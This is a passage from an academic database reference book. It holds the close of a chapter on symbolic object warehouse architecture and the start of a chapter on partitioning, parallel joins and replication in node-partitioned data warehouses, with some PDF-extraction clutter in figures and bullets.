universe) in L depending on R and d (Diday, 2003). According to Gowda’s definition: “SOs are extensions of classical data types and they are defined by a logical conjunction of events linking values and variables in which the variables can take one or more values, and all the SOs need not be defined on the same variables” (Gowda, 2004). We consider SOs as a new data type for complex data define algebra at Symbolic Data Analysis. An SO models an individual or a class maintaining its taxonomy and internal variation. In fact, we can represent a concept by its intentional description, i.e. the necessary attributes to characterize to the studied phenomenon and the description allows distinguishing ones from others. The key characteristics enumerated by Gowda (2004) that do SO a complex data are: • • •
• •
All objects of a symbolic data set may not be defined on the same variables. Each variable may take more than one value or even an interval of values. In complex SOs, the values, which the variables take, may include one or more elementary objects. The description of an SO may depend on the existing relations between other objects. The descriptor values may have typicality values, which indicate frequency of occurrence, relative likelihood, level of importance of the values, …
There are two main kinds of SOs (Diday & Billard, 2002): •
650
Boolean SOs: The instance of one binary relation between the descriptor of the object and the definition domain, which is defined to have values true or false. If [y (w) R d] = {true, false} is a Boolean SO. Example: s=(pay-mode ∈ {good; regular}), here we are describing an individual/class of customer whose payment mode is good or regular.
•
Modal SOs: In some situations, we cannot say true or false, we have a degree of belonging, or some linguistic imprecision as always true, often true, fifty-fifty, often false, always false; here we say that the relation is fuzzy. If [y (w) R d] ∈ L = [0,1] is a Modal SO. Example: s=(pay-mode ∈ [(0.25) good; (0.75) regular]), at this point we are describing an individual/class of customer that has payment mode: 0.25 good; 0.75 regular.
The SO extension is a function that helps recognize when an individual belongs to the class description or a class fits into a more generic one. In the Boolean case, the extent of an SO is denoted Ext(s) and defined by the extent of “a”, which is: Extent (a) = {w ∈ Ω / a (w) = true}. In the Modal instance, given a threshold α, it is defined by Extα (s)= Extentα (a)= {w ∈ Ω / a (w) ≥ α}. It is possible to work with SOs in two ways: • •
Induction: We know values of their attributes then we know what class they belong. Generalization: We want to form a class from the generalization/specialization process of the values of the attributes of a set of individuals.
There is an important number of methods (Bock et al, 2000) developed to analyze SO, which were implemented in Sodas 1.2 and Sodas 2.5 software through Sodas and Asso projects respectively; whose aim is to analyze official data from Official Statistical Institutions (see ASSO or SODAS Home Page). The principal advantages in SO use are (Bock & Diday, 2000; Diday, 2003): • • •
It preserves the confidentiality of the information. It supports the initial language in the one that SOs were created. It allows the spread of concepts between Databases.
Architecture for Symbolic Object Warehouse
•
Being independent from the initial table, they are capable of identifying some individual coincidence described in another table.
Notice we take an SO as every value of the variable work activity. The SOs descriptors are written in the same notation used in Bock and Diday’s book:
As a result of working with higher units called concepts necessarily described by more complex data, DM is extended to Knowledge Mining (Diday 2004).
Table 2. Taxonomy
Construing SOs
Country Spain China Australia Sudan Argentina India France Canada Italy Germany EEUU
Now we are going to create SOs, Let’s suppose we want to know client’s profile grouped by work’s activity. How do we model this kind of situations with SOs? The SOs descriptor must have the following attributes: 1. 2. 3.
Continent Age Study Level
Suppose that in our operational databases we have stored the relational Tables 1 and 2.
Continent Europe Asia Oceania Africa America Asia Europe America Europe Europe America
SO-Agriculture (4) = [Study Level ={“low”(0.50), “medium”(0.50)}] ∧ [Continent = {“America”(0.5), “Europe”(0.25), “Oceania”(0.25)}] ∧ [Age= [30:42]]]. SO - Manufacture s (3) = [St udy Level ={“low”(0.33), “medium”(0.33), “high”(0.33)}] ∧ [Continent = {“Asia”(0.33), “Europe”(0.66)}] ∧ [Age= [28:50]]]. SO-Services (4) [Study Level ={“medium”(0.25), “high”(0.75)}] ∧ [Continent = {“Africa” (0.25), “America”(0.25), “Asia”(0.25), “Europe”(0.25)}] ∧ [Age= [39:60]]]. Now we have second order units representing the concept activity of our clients. The number in brackets is the quantity of individuals belonging to the SO, the variables show the values for the class, for example SO-Manufactures: the variable Study Level shows equal probability. The clients are distributed 33 % in Asia and 66 % in Europe. The age is between 39 and 60 years. To plan the analysis units or SOs we need: • •
Knowledge domain, Rules of the business,
•
Type of information stored in the operational systems, -organizational structures.
We call the former elements Background Knowledge.
Architecture Figure 1 shows the information flows, information knowledge and the most important tasks covered by this architecture (González Císaro, Nigro & Xodo, 2006). Generally, almost all current DW and DM solutions are based on decoupled architectures. DM tools suppose the data to be already selected, cleaned and transformed. Solutions integrating steps must be addressed. Figure 2 shows a conceptual architecture to identify the most important modules of the system. A manager is associated to each of them, so that they achieve flexibility (it is simple to add new functions); and the functionality encapsulation in every component helps the design organization and modularization. Thus, we can distinguish: •
System functionalities.
Figure 1. Information & knowledge flow
Updated Knowledge
Organizational and Background Knowledge Extraction Transformation Load Operational DBs Extern Souces Integration And Tranformation Functions
652
Metadata Visualization
SOs Marts
Symbolic Objects Warehouse
SOs Selectionat ed
SOs Mining algorithms
Novel Knowledge
Results
Actions
Architecture for Symbolic Object Warehouse
Figure 2. Conceptual architecture
Operational DBs & Background Knowledge
Intelligent Interface
ETL Manager Extraction & Load Engine
Mining & Layout Manager Mining Scheduler
Method Engine
ETL Scheduler
Exploration Manager Method DB Graphic Scheduler
Transformation & Clean Engine
SO Store Manager
SO Database
• •
Metadata DB
What component carries out each task Information/knowledge workflows.
In the next paragraphs, a briefly explanation of each component functionality is completed. Intelligent Interface: It is responsible for the connection between the system and the user. We design this component with two Intelligent
SO Store Scheduler Auditor
Discovery Assistants (Bernstein et al., 2005); one assists in DW tasks and the other with analysis or DM. ETL Manager: The user defines the SO descriptor and the system must obtain the data from operational databases and external sources. Two different types loads are assumed:
653
Architecture for Symbolic Object Warehouse
• •
Initial a predefined SO descriptor, which models the principal business concepts. Ad hoc with new SOs, which respond to new informational requirements.
The major sub components of ETL Manager module are: • • •
Future Trends The next step is the formal specification of the architecture in terms of design. The problems to be resolved are: •
Mining & Layout Manager: It is the core analysis. It shows SOs descriptors and makes all type of graphics. Particularly, graphic subcomponent has to implement Zoom Star graphic (Noirhomme, 2000, 2004), which is the best way to visualize SOs. The main subcomponents are: • • • • •
Mining Scheduler Method Engine Method DB Graphic Manager Exploration Manager
SO Store Manager: It stores the SOs, SOs metadata, does concurrence control, audits and it is safe. Also, the component logs, controls, assigns and changes roles with the users. Metadata for SOs, as Vardaki (2004) affirms, should describe the symbolic variables, their nature, components and domain. All metadata necessary for Symbolic data creation and processing can be presented as a metadata template or modeled in a separate metadata schema. The advance of the modeling process is that it will indicate not only the metadata items considered and in a structured format, specify their relation and the operators/transformations that can be applied for further manipulations. In this architecture, an independently adopted schema to store metadata about SOs- Metadata DB was adopted. The SO Store Management has four key subcomponents:
654
SO & Metadata Scheduler SO Database Metadata DB Auditor
•
The construction of a language to manipulate SOs. How to store SOs since temporary and spatial efficiency is necessary.
Given the functional modularity, an objectoriented implementation would be the most suitable. Another implementation that would be very attractive is through a multi-agents system. Potential progress in the algorithms that work on SOs will be guided by the techniques to be explored and developed. The most important and useful in DM are: Association Rules, Regressions, Cluster Interpretability and other types of Neuronal Networks.
CONCLUSION An SO allows representing physics entities or real word concepts in dual form, respecting their internal variations and structure. The SO Warehouse permits the intentional description of most important concepts by means of the initial language users make use of. The quality control, security and accuracy of information are obtained in SO creation processes, since the null values means are established in this process and the metadata are included (the latter are especially important in DW and the DMP). One of the most valued advantages in the use of SO is the capacity to carry out various levels of analysis, with which the output of one method
Architecture for Symbolic Object Warehouse
is the input of the other. This can be observed in clustering or classification methods, as in most cases the output is a SOs set. The principal disadvantages arisen by the use of SOs are: •
•
The complexity in the determination of whom will be the best SOs that will represent the analysis tasks in the organization. When to update or to change SOs.
As a result of the flexibility and modularity of its design, our architecture allows an integrated environment of work, with possibilities of improvement and growth. As regards Symbolic Data Analysis, DW & DM integration is very important since it can be very practical to add the discovered knowledge into DW. We discover new potential clients characteristics or relations thus SO descriptors in DW can be updated, creating new SOs. Therefore, the work with higher units like SOs could improve Knowledge Management and Decision-Making Processes.
REFERENCES ASSO, Project Home Page. Retrieved May 2006, from http://www.info.fundp.ac.be/asso/. Bernstein, A., Provost, F. & Hill, S. (2005).”Towards Intelligent Assistance for a Data Mining Process: An Ontology-based Approach for Costsensitive Classification”, IEEE Transactions on Knowledge and Data Engineering, 17( 4), pp 503-518. Bock, H. & Diday, E. (2000) Analysis of Symbolic Data. Studies in Classification, Data Analysis and Knowledge Organization. Heidelberg, Germany. Springer Verlag-Berlin. Cali, A., Lembo, D., Lenzerini, M. & Rosati, R. (2003). Source Integration for Data Warehousing. In Rafanelli M. (Ed.), Multidimensional Data-
bases: Problems and Solutions (pp. 361-392), Hershey, PA: Idea Group Publishing Calvanese, D. (2003) Data integration in Data Warehousing. Invited talk presented at Decision Systems Engineering Workshop (DSE’03), Velden, Austria. Damiáni, M. & Spaccapietra, S. (2006) Spatial Data in Warehouse Modeling. In Darmont, J. & Boussaid, O. (Eds) Processing and Managing Complex Data for Decision Support (pp. 1-27). Hershey, PA: Idea Group Publishing. Darmont, J. & Boussaid, O. (2006). Processing and Managing Complex Data for Decision Support. Hershey, PA: Idea Group Publishing. Diday, E. & Billard, L. (2002). Symbolic Data Analysis: Definitions and examples. Retrieved March 27, 2006, from http://www.stat.uga.edu/ faculty/LYNNE/tr_symbolic.pdf. Diday, E. (2003). Concepts and Galois Lattices in Symbolic Data Analysis. Journées de l’Informatique Messine. JIM’2003. Knowledge Discovery and Discrete Mathematics Metz, France. Diday, E. (2004). From Data Mining to Knowledge Mining: Symbolic Data Analysis and the Sodas Software. Proceedings of the Workshop on Applications of Symbolic Data Analysis. Lisboa Portugal. Retrieved January 25, 2006, from http:// www.info.fundp.ac.be/asso/dissem/W-ASSOLisbon-Intro.pdf González Císaro, S., Nigro, H. & Xodo, D.(2006, February). Arquitectura conceptual para Enriquecer la Gestión del Conocimiento basada en Objetos Simbólicos. In Feregrino Uribe, C., Cruz Enríquez, J. & Díaz Méndez, A. (Eds.) Proceeding of V Ibero-American Symposium on Software Engineering (pp. 279-286), Puebla, Mexico. Gowda, K. (2004). Symbolic Objects and Symbolic Classification. Invited paper in Proceeding of
655
Architecture for Symbolic Object Warehouse
Workshop on Symbolic and Spatial Data Analysis: Mining Complex Data Structures. ECML/PKDD. Pisa, Italy.
Vardaki, M. (2004). Metadata for Symbolic Objects. JSDA Electronic Journal of Symbolic Data Analysis- 2(1). ISSN 1723-5081.
Gorawski, M., Malczok, R. (2003). Distributed Spatial Data Warehouse. 5th International Conference on Parallel Processing and Applied Mathematics, Cz_stochowa, Springer Verlag, LNCS3019.
KEY TERMS
Han, J. & Kamber, M. (2001). Data Mining: Concepts and Techniques, San Francisco: Morgan Kaufmann. Inmon, W. (1996). Building the Data Warehouse (2nd edition). New York: John Wiley & Sons, Inc. King, D. (2000). Web Warehousing: Business as Usual? In DM Review Magazine. May 2000 Issue. Nigro, H. & González Císaro, S. (2005). Symbolic Object and Symbolic Data Analysis. In Rivero, L., Doorn, J. & Ferraggine, V. (Eds.) Encyclopedia of Database Technologies and Applications. Hershey, PA: Idea Group Publishing, p. 665-670. Noirhomme, M. (2004, January). Visualization of Symbolic Data. Paper presented at Workshop on Applications of Symbolic Data Analysis. Lisboa Portugal. Sodas Home Page. Retrieved August 2006, from http://www.ceremade.dauphine.fr/~touati/sodaspagegarde.htm. Simitsis, A., Vassiliadis, P., Sellis, T., (2005). Optimizing ETL Processes in Data Warehouses. In Proceedings of the 21st IEEE International Conference on Data Engineering (pp. 564-575), Tokyo, Japan. Staudt, M., Vaduva, A. and Vetterli, T. (1999). The Role of Metadata for Data Warehousing. Technical Report of Department of Informatics (IFI) at the University of Zurich, Swiss.
656
Cascaded Star Model: A main fact table. The main dimensions form smaller star schemas in which some dimension tables may become a fact table for other, nested star schemas. Customer Relationship Management (CRM): A methodology used to learn more about customers’ wishes and behaviors in order to develop stronger relationships with them. Enterprise Recourse Planning (ERP): A software application that integrates planning, manufacturing, distribution, shipping, and accounting functions into a single system, designed to serve the needs of each different department within the enterprise. Intelligent Discovery Assistant: Helps data miners with the exploration of the space of valid DM processes. It takes advantage of an explicit ontology of data-mining techniques, which defines the various techniques and their properties. (Bernstein et al, 2005, pp 503-504). Knowledge Management: An integrated, systematic approach to identifying, codifying, transferring, managing, and sharing all knowledge of an organization. Supply Chain Management (SCM): The practice of coordinating the flow of goods, services, information and finances as they move from raw materials to parts supplier to manufacturer to wholesaler to retailer to consumer. Symbolic Data Analysis: A relatively new field that provides a range of methods for analyzing complex datasets. It generalizes classical
Architecture for Symbolic Object Warehouse
methods of exploratory, statistical and graphical data analysis to the case of complex data. Symbolic data methods allow the user to build models of the data and make predictions about future events (Diday 2002).
Zoom Star: A graphical representation for SO where each axis correspond to a variable in a radial graph. Thus it allows variables with intervals, multivaluate values, weighted values, logical dependences and taxonomies to be represented. A 2D and 3D representation have been designed allowing different types of analysis.
This work was previously published in Encyclopedia of Data Warehousing and Mining, Second Edition, edited by J. Wang, pp. 5865, copyright 2009 by Information Science Reference, formerly known as Idea Group Reference (an imprint of IGI Global).
657
658
Chapter 2.14
Efficient and Robust Node-Partitioned Data Warehouses Pedro Furtado Universidade de Coimbra, Portugal
ABSTRACT Running large data warehouses (DWs) efficiently over low cost platforms places special requirements on the design of system architecture. The idea is to have the DW on a set of low-cost nodes in a nondedicated local area network (LAN). Nodes can run any relational database engine, and the system relies on a partitioning strategy and query processing middle layer. These characteristics are in contrast with typical parallel database systems, which rely on fast dedicated interconnects and hardware, as well as a specialized parallel query optimizer for a specific database engine. This chapter describes the architecture of the nodepartitioned data warehouse (NPDW), designed to run on the low cost environment, focusing on the design for partitioning, efficient parallel join and query transformations. Given the low reliability of the target environment, we also show how replicas are incorporated in the design of a robust NPDW strategy with availability guarantees and how the replicas are used for always-on, always
efficient behavior in the presence of periodic load and maintenance tasks.
INTRODUCTION Data warehouses (DWs) are specialized databases storing historical data pertaining to an organization. The objective is to allow business analysis on varied perspectives. They have been applied in many contexts, for instance, insurance companies keeping track of individual events on insurance policies, telecom companies with terabytes of data tracking individual phone calls or individual machine events in production factories, generating gigabytes of detailed data per day. The degree of detail over which the data is stored in the data warehouse can vary, but from the examples given, it is easy to see that data warehouses can become extremely large. As such, multiple performance optimization strategies can be sought after, ranging from specialized indexing, materialized views for faster computation over predicted
Efficient and Robust Node-Partitioned Data Warehouses
query patterns, to parallel architectures and parallel processing. Parallel database systems are implemented on one of the alternative parallel architectures: shared-memory, shared-disk, shared nothing, hierarchical, or NUMA (Valduriez & Ozsu, 1999), which have implications on parallel query processing algorithms, data partitioning, and placement. In practice, parallel environments involve several extra overheads related to data and control exchanges between processing units and also concerning storage, so that all components of the system need to be designed to avoid bottlenecks that would compromise the whole processing efficiency. Some parts of the system have to account for the aggregate flow into/from all units. For instance, in shared-disk systems the storage devices and interconnections should be sufficiently fast to handle the aggregate of all accesses without becoming a significant bottleneck. To handle these requirements, a significant initial and continuous investment is necessary in specialized, fast, and fully-dedicated hardware. An attractive alternative is to use a number of low-cost computer nodes in a shared-nothing environment, possibly in a nondedicated local network. The only requirement is that each node has some database engine and connectivity, while a middle layer provides parallel processing. This system must take into consideration partitioning and processing, as the computer nodes and interconnects are not specially designed to that end. The node-partitioned data warehouse (NPDW) is a generic architecture for partitioning and processing over the data warehouse in such an environment. The objective of this chapter is to discuss and analyze partitioning, processing, and availability issues in the design of the NPDW.
BACKGROUND Typical data warehouse schemas have some distinctive properties: they are mostly read-only, with periodic loads. This characteristic minimizes
consistency issues which are a major concern regarding the parallelization of transactional schemas and workloads; data warehouse schemas usually have multidimensional characteristics (Kimball, Reeves, Ross, & Thornthwaite, 1998), with large central fact relations containing several measurements (e.g., the amount of sales) and a size of up to hundreds or thousands of gigabytes, and dimensions (e.g., shop, client, product, supplier). Each measurement is recorded for each individual combination of dimension values (e.g., sales of a product from a supplier, in one shop and for an individual client). While there are specific analysis-oriented data marts stored and analyzed using some nonrelational multidimensional engine (Kimball, Reeves, Ross, & Thornthwaite, 1998), our focus is on the large central repository warehouses stored in a relational engine; warehouses are used for online analytical processing (OLAP), including reporting and ad-hoc analysis patterns. OLAP involves complex query patterns, with joins involving multiple relations and aggregations. These query patterns can pose difficulties to the performance of shared-nothing partitioned environments, especially when nodes need to exchange massive quantities of data. While very small dimensions can be replicated into every node and kept in memory to speed up joins involving them, much more severe performance problems appear when many large relations need to be joined and processed to produce an answer. We use the schema and query set of the decision support performance benchmark TPC-H (TPC) as an example of such a complex schema and query workload and also as our experimental testbed. Performance and availability are relevant issues in data warehouses in general and pose specific challenges in the NPDW context (standard computer nodes and nonspecialized interconnects). Some research in recent years has focused on ad-hoc star join processing in data warehouses. Specialized structures such as materialized views (Rousopoulos, 1998) and specialized indexes (Chan & Ioannidis, 1998; O’Neil & Graefe, 1995)
659
Efficient and Robust Node-Partitioned Data Warehouses
have been proposed to improve response time. Although materialized views are useful in a context in which queries are known in advance, this is not the case when ad-hoc queries are posed. Parallel approaches are therefore important as they can be used alone or in conjunction with specialized structures to provide efficient processing for any query pattern at any time. In the past, there has also been a lot of work on implementing database systems over conventional shared-nothing architectures, as reviewed in DeWitt and Gray (1992). A shared-nothing architecture consists of a set of independent computer nodes that are connected through some network. Each node has its own storage devices and there is no expensive local area storage network with shared storage devices. Additionally, the NPDW does not assume any specialized fast interconnects between nodes, as it should work over a nondedicated local area network. In this context, performance is very dependent on strategies to partition data into nodes’ storage devices and processing into nodes’ processing units, respectively. It is also very dependent on achieving a balance between data exchange requirements and autonomous processing among nodes. The lack of fast specialized hardware and interconnects in the target environment means that there would be too large a penalty if relations were not carefully placed among nodes to explore parallelism power and reduce bottlenecks. This is the reason why one of the major concerns is to decide how to partition or cluster relations into nodes both on initial placement and subsequent reorganizations.
Partitioning, Parallel Join, and Cost Models Several strategies have been proposed for efficient distributed placement and query processing. The semi-join operator (Bernstein & Chiu, 1981) applies selection and projection operations before sending data through the network. Other proposed strategies for efficient distributed query process-
660
ing include placement dependency (Liu, Chen, & Krueger, 1996), which uses dependency relationships between relations to co-locate fragments for faster processing. This and other alternative strategies are compared experimentally in Liu and Yu (1993). The most promising solutions to extra join overheads that characterize many successful parallel and distributed database systems in shared-nothing environments involve hashpartitioning large relations into nodes in order to minimize data exchange requirements (DeWitt & Gerber, 1985; Kitsuregawa, Tanaka, & Motooka, 1983). Parallel hash-join algorithms, also reviewed in Yu and Meng (1998), consider partitioning and allocating intervening relation fragments into processors or computer nodes for fast join processing. These strategies typically allocate a hash range to each processor, which builds a hash table and hashes relation fragments accordingly. In a shared-nothing environment, it often becomes necessary to exchange data between nodes in order to send tuples into the node that has been allocated the corresponding hash-value range for the join attribute. This process is called partitioning, if the relation is not partitioned yet, or repartitioning, if the relation is already partitioned but must be reorganized. Both operations can be costly because they may require heavy data exchange over the network connecting the nodes. In this work we will refer to partitioning (and placement) not as the operation of partitioning while processing a join but rather as an initial placement and sporadic reorganization task that decides which relations are to be divided or replicated into nodes and which partitioning attributes are to be used. Williams and Zhou (1998) review five major data placement strategies (size-based, access frequency-based, and network traffic based) and conclude experimentally that the way data is placed in a shared-nothing environment can have considerable effect on performance. Hua and Lee (1990) use variable partitioning (size and access frequency-based) and conclude that partitioning increases throughput for short
Efficient and Robust Node-Partitioned Data Warehouses
transactions but complex transactions involving several large joins result in reduced throughput with increased partitioning. Some of the most promising partitioning and placement approaches focus on query workload-based partitioning choice (Rao, Zhang, & Megiddo, 2002; Zilio, Jhingram, & Padmanabhan, 1994). These strategies use the query workload to determine the most appropriate partitioning attributes, which should be related to typical query access patterns. But while they are targeted at generic parallel databases and may require tight integration with a specific cost predictor and optimizer (Rao et al., 2002), we discuss generic data partitioning that is independent of the underlying database server and targeted at node partitioned data warehouses (Furtado, 2004a, b, c). Consider the query Q = { R1.A2, R 2.A4 | R1.A1=R2.A1 Λ R 2.A1=R3.A1 Λ R3.A2=R4.A2 Λ R3.A3=R5.A3}, where Ri are relations and Ai are attributes. The join graph of Figure 1a is a graph where vertices correspond to attributes R.A participating in equi-joins and the edges depict the set of equi-
joins between those attributes. A component is a set of interconnected vertices and its edges. The join graph of the query workload (JGQW) shown in Figure 1b adds every join pattern occurring in the workload—the set of historical or expected queries—with a weight on each edge representing the frequency of occurrence of the corresponding join on the query workload (either a percentage or number of occurrences) (Furtado, 2004a). Nodes of a component of a join graph form a set of relations that can be joined without requiring repartitioning and redistribution. The focus of the workload-based algorithms in Furtado (2004a, 2004b, 2004c) is to partition the whole relations in the join graph in a way that results in reduced repartitioning cost and redistribution requirements. Given this JGQW graph, a simple partitioning algorithm can assign partitioning attributes starting by the most frequent join (R3. A2, R2.A2 in the figure), to reduce the amount of repartitioning. More complex algorithms may search in the space of possible alternative execu-
Figure 1. Join and query graphs for the example: (a) join graph and (b) join graph for query workload (JGQW) R1.A1
R2.A1
R3.A1
c1 R3.A2
R4.A2 c2
R3.A3
R5.A3 c3 (a)
R3.A2 R1.A1
R2.A1
R4.A2 8
R3.A1
3
R2.A2
R3.A2
R3.A3
R5.A3 6
10 (b)
661
Efficient and Robust Node-Partitioned Data Warehouses
tion plans, evaluating a cost for each possible plan (Kossman & Stocker, 2000). In a data warehouse, there are an additional set of patterns that are important to guide the partitioning algorithm. Data warehouses have facts and dimensions, facts reference dimensions, and queries almost always join dimensions by their primary key. As a result, the algorithm we proposed in Furtado (2004c) partitions dimensions by primary keys (except small ones, which are replicated) and applies workload-based partitioning to facts. Several works refer to the cost of processing queries over a distributed database or query optimization (query plan selection) in such context (Kossman & Stocker, 2000; Sasha, Wang, & Tsong-Li, 1991; Steinbrunn, Moerkotte, & Kemper, 1997; Yu, Guh, Brill, & Chen, 1989). Yu et al. (1989) consider partitioning, local processing, and data communication costs in their cost model, to determine which relations should be partitioned and replicated, considering that no relation is prepartitioned. Algorithms and optimizations for parallel processing of multiway joins over hash-partitioned relations are considered by Sasha et al. (1991). The authors also introduce a cost model and propose algorithms to determine the most efficient join order for multiway joins over fully partitioned relations in a shared-nothing cluster. Some works (Kossman & Stocker, 2000; Steinbrunn et al., 1997) consider heuristic search for the best overall execution plan, considering that the search for the optimal plan is an NP-hard problem.
Low Bandwidth and Early Selection Another factor that affects the efficiency of partitioning schemes is the “available bandwidth.” Given that the network interconnecting the computer nodes may be slow, nondedicated, or the system may be running several queries simultaneously, it is important to take into account the possibility of low available bandwidth. This
662
is a motivation for also considering partitioning schemes that favor replication such as strategies based on the partition and replicate strategy (PRS) of Yu et al. (1989), which partitions a single relation and replicates all others to process joins without repartitioning requirements. Another relevant approach to reduce both the amount of repartitioning and also of local processing at each node is to apply early-selection strategies. These apply selection conditions as early as possible to datasets so that much less tuples need to be processed and exchanged. A bitmap index (Chan & Ioannidis, 1998) contains one bitmap per possible value of a given attribute (or a coded bitmap with b bits for 2b possible values); the bitmap consists of one bit (or code) per row to indicate whether or not that row matches the respective attribute value. Chan and Ioannidis (1998) describe and analyze the use of bitmap indexes. When accessing a relation to answer a query, bitmaps are read and bitwise-operated (e.g., logical AND of bitmaps) to determine which relation tuples qualify for the query before even reading the relation itself. All processing and data exchanging is then applied to this reduced subset of tuples. Bitmap join indexes (O’Neil & Graefe, 1995) are very efficient materialized structures for avoiding costly joins. When bitmap join indexes are applied to a data warehouse schema, each bitmap indicates which fact rows correspond to each attribute value of a dimension table, representing the precomputed result of a join between the fact and a dimension table. Consider the simple example of a “Sales” fact, a “Product” dimension, and a “Brand” attribute within “Product.” A bitmap for Brand “X” associates a bit with each row of the Sales fact with a “1” bit if that row is a sale of Brand “X” and a “0” bit otherwise. A query for sales of brand “X” may scan the bitmap and then read only rows of Sales corresponding to that Brand. More importantly, it also avoids the need to join Sales with Product and therefore the need to repartition Part if it is partitioned and
Efficient and Robust Node-Partitioned Data Warehouses
not co-located with Sales. In summary, the use of early-selection and in particular bitmap join indexes reduces the amount of data that must be exchanged very significantly, as long as there are selective conditions on the query patterns. Next we review replication for availability issues, as it is also a major concern in the lowreliability environment of the NPDW.
Replication for Availability A discussion of availability for node-partitioned data warehouses brings up several issues like network failures, data loading failures, or availability monitoring. Each of these issues requires specific solutions. For instance, network failures can be accommodated using backup connections. We concentrate on handling the possible unavailability of computing nodes, guaranteeing efficient availability, and promoting manageability. The objective is that the system be always-on and always efficient even when nodes are unavailable or entire parts of it are taken off-line for maintenance and management functions, such as loading with new data or other DBA functionality. Efficient node availability can be achieved via the use of replicas. A replica is a “standby” copy of some data that can be activated at any moment in case of unavailability or failure of the node holding the “original,” so that processing resumes as usual. If processing with unavailable nodes is implemented efficiently, unavailability becomes less onerous to the whole system and it becomes feasible to have nodes unavailable or to stop a set of nodes for data loading, maintenance, upgrading, or other management activities without any major repercussions to processing. Replica placement has been studied in different contexts, from RAID disks (Patterson, Gibson, & Katz, 1998) to the context of generic parallel and distributed databases. Replication strategies for shared-nothing systems range from mirrored disk drives (Tandem, 1987) to chained declustering (Hsiao & DeWitt, 1990a, b, 1991) or interleaved
declustering (Teradata, 1985). Copeland and Keller (1989) compare some of these high-availability media recovery techniques. There are also recent works on replication (Coloun, Pacitti, & Valduriez, 2004; Lin, Kemme, & Jimenez-Peris, 2005; Pacitti, Özsu, & Coulon, 2003), but the emphasis is on transaction-related consistency issues. In general, most works focus generic replication strategies for availability considering nonpartitioned relations and OLTP workloads, while in this chapter we briefly discuss and evaluate replication on the specific node-partitioned data warehouse context. An extended discussion on the subject is available in Furtado (2005c).
PARTITIONING AND PROCESSING OVER THE NPDW In a partitioning scheme, each relation can either be partitioned (divided into partitions or fragments), copied in its entirety, or placed into a single node of a group of nodes. We simplify the discussion by considering only one group (all nodes) and homogeneity between nodes, in order to concentrate on the core partitioning and processing issues. Generically, if a relation is large or very large, partitioning is the choice that drives faster processing. On the other hand, very small relations can be replicated to avoid the need to repartition other very large datasets that may need to be joined with them. In practice the decision on replication vs. partitioning for each relation can be taken by a cost-based optimizer that evaluates alternative execution plans and partitioning scenarios to determine the best one. Horizontally-partitioned relations can typically be divided using a round-robin, random, range, or hash-based scheme. We assume horizontal hash-partitioning, as this approach facilitates key-based tuple location for parallel operation. Partitioning is intimately related to processing issues. Therefore, first we describe generic query
663
Efficient and Robust Node-Partitioned Data Warehouses
processing over the NPDW. Then we focus on parallel join and partitioning alternatives.
Generic Processing over the NPDW Query processing over a parallel shared-nothing database, and in particular over the NPDW, follows roughly the steps in Figure 2(b). Figure 2(a) illustrates a simple sum query example over the NPDW. In this example the task is divided into all nodes, so that each node needs to apply exactly the same initial query on its partial data, and the results are merged by applying a merge query again at the merging node with the partial results coming from the processing nodes. If the datasets could be divided into N nodes and processed independently, each node would process its part (1/N) independently with a speedup of approximately N, and only the merge part of the query would represent extra overhead. More generically, the typical query processing cycle implemented by the query processing middle layer is shown in Figure 2(b) and an example is given in Figure 3. A query is executed in steps. Step 1 “Rewrite Query” prepares the node and merge query components from the original submitted query. Step 2 “Send Query” forwards the node query into all nodes, which process the query locally in step 3. Each node then sends its partial result into the submitter node (step 4), which applies the merge query in step 5. Step
6 redistributes results into processing nodes if required (for some queries containing subqueries, in which case more than one processing cycle may be required). The query processing middle layer transforms queries into node queries and controls repartitioning requirements for processing operations such as parallel join. In steps 1 and 2 of Figure 3 we can see that query aggregation expressions are replaced by aggregation primitives to be computed at each node and merged afterwards to obtain the results. The most common primitives are: Linear sum (LS=SUM(X)); Sum of squares (SS=SUM(X2)); Number of elements (N); and Extremes (MAX and MIN). Although in Figure 3 every node computes partial aggregations for all aggregation groups, aggregation can also be computed by assigning the computation of specific aggregation groups to specific nodes (Shatdal & Naughton, 1995). A detailed study and evaluation of query processing issues in the NPDW is available in Furtado (2005a). The repartitioning operation of step 3R in Figure 2(b) is necessary whenever a partitioned dataset needs to participate in a join but is not partitioned by the join attribute. Each node is assigned a hash range for the join key, and every node needs to send to every other node the tuples it has that belong to the hash-range corresponding to that node. It should be implemented as
Figure 2. Query processing steps in NPDW: (a) example query (b) query processing steps
a
664
Efficient and Robust Node-Partitioned Data Warehouses
Figure 3. Basic aggregation query steps 0. Query submission: Select sum(a), count(a), average(a), max(a), min(a), stddev(a), group_attributes From fact, dimensions (join) Group by group_attributes;
3. Nodes compute partial results: Select sum(a), count(a), sum(a x a), max(a), min(a), group_attributes From fact, dimensions (join) Group by group_attributes;
5. Results merging: Select sum(suma), sum(counta), sum(suma) / sum(counta), max(maxa), min(mina) (sum(ssuma)-sum(suma)2)/sum(counta), group_ attributes From UNION_ALL(PRqueryX), dimensions (join) Group by group_attributes;
efficiently as possible to minimize the cost. We assume a switched network (the cost of repartitioning would be larger on a shared-media hubbased network). A simple parallel repartitioning algorithm would be: Number the N nodes sequentially; For (i=1;i z group by n_nation, o_year; (b)
(a)
Figure 6. Node contents for PRS and PFRD-H partitioning strategies: (a) PRS partitioning, and (b) PFRD-H partitioning
(a)
this case. This strategy allows joins to be processed without any data exchange between nodes, but the overhead of processing large replicated relations can be prohibitive. With PRS, the join execution plan of Figure 5(b) would be executed without any data exchange between nodes, but each node would need to process full O and PS relations, which are 18 and 7.5 GB in size considering TPC-H with 100 GB (scale factor 100). In order to avoid replicating very large relations, a modified strategy is to replicate dimensions and partition every fact, while also co-locating LI and O:
(b)
•
•
Hash-partition fact and replicate dimensions strategy (PFRD-H): Partition relations identified as facts by the user (LI, O, and PS in TPC-H), co-locating LI and O. With PFRD-H, the execution plan of Figure 4b requires repartitioning of only two datasets: the intermediate result LI-O-P-S and relation PS. The join between LI and O is a LocalJ. Workload-based partitioning (WBP): A workload-based strategy where hash-partitioning attributes are determined based on schema and workload characteristics.
667
Efficient and Robust Node-Partitioned Data Warehouses
Figure 7. WBP partitioning
